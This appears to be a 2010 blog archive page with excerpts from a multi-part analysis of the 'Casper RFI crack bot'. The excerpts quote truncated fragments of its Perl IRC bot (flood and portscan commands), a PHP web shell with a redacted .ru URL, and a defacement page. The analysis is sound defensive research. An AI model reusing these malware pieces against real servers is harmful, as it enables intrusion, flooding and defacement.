Irregular Expressions:

August, 2010


August 27, 2010  1:14 PM

Casper RFI crack bot – Part 9

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

So it looks like sh.txt is all about shell access, wow what a surprise! The next item is def.txt, there is not a whole lot in there beside the defacement message, so we are going to move on. The next item is a tar.gz, psy.tar.gz.  Let's unpack it and look around. It's from a project...

August 27, 2010  11:59 AM

Casper RFI crack bot – Part 8

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

We have one more to decode, $shell_data

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target =...


August 27, 2010  8:48 AM

Casper RFI crack bot – Part 7

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was...


August 27, 2010  8:33 AM

Casper RFI crack bot – Part 6

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

We can do something fun with this,

$defacer     = "def.txt";
less def.txt
<title>-- Hacked bY XXXXXXXX --</title>
Off to Google we go, this won't give an exact number, but we are going to be able to get a count of the number of web servers this guy...


August 22, 2010  9:44 PM

Casper RFI crack bot – Part 5

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de, both sites are no longer up and have not been for a while. There is also a few things worth looking in to here, the script mentions fx29shell.php.  Which is a php shell that can be loaded onto the system. I can...


August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

sh.txt This one also looks juicy! Another php, <?php $sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20="; $sh_ver = "0.0 01.01.2010"; $sh_name = base64_decode($sh_id).$sh_ver; $sh_mainurl = "http://xxxxxx.ru/config/"; $html_start =...


August 21, 2010  12:12 AM

Casper RFI crack bot – Part 3

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

iso.txt is looking promising for a peak.

#!/usr/bin/perl
#
#  ShellBOT by: XXXXXXXXXXXX
#       Greetz: XXXXXXXXXXXXXX
#
# Comandos:
#           @oldpack <ip> <bytes> <tempo>;
#           @udp <ip> <porta> <tempo>;
#           @fullportscan...


August 21, 2010  12:04 AM

Casper RFI crack bot – Part 2

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

There is more then one file in each rar that appears to be a copy of the bot. The differences are pretty minor.

scan.txt
-my @servers = ("irc.xxxx.org");
+my @servers = ("irc.xxxxxx.org","irc.xxxxxx.org");

@@ -3,7 +3,7 @@
 ################################
 #  CASPER RFI CRACK Bot v1.1 ...


August 20, 2010  10:31 PM

Casper RFI crack bot – Part 1

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

If you saw the ISC today (isc.sans.edu) there is a posting about a perl Unix bot making the rounds. http://isc.sans.edu/diary.html?storyid=9430 There is signatures around from emerging threats to detect the bot, if you need them. http://doc.emergingthreats.net/2011176 I have found a server...


August 16, 2010  5:21 PM

Good blog on iPhone / iPad hacking

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

http://blog.iphone-dev.org/ I wish I could link to the first article.  It talks about a patch out for non early iPhone and iPod touch users that leaves them with security holes, that they fixed and can be applied through Cydia! I really appreciate people that take their time to give back...


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: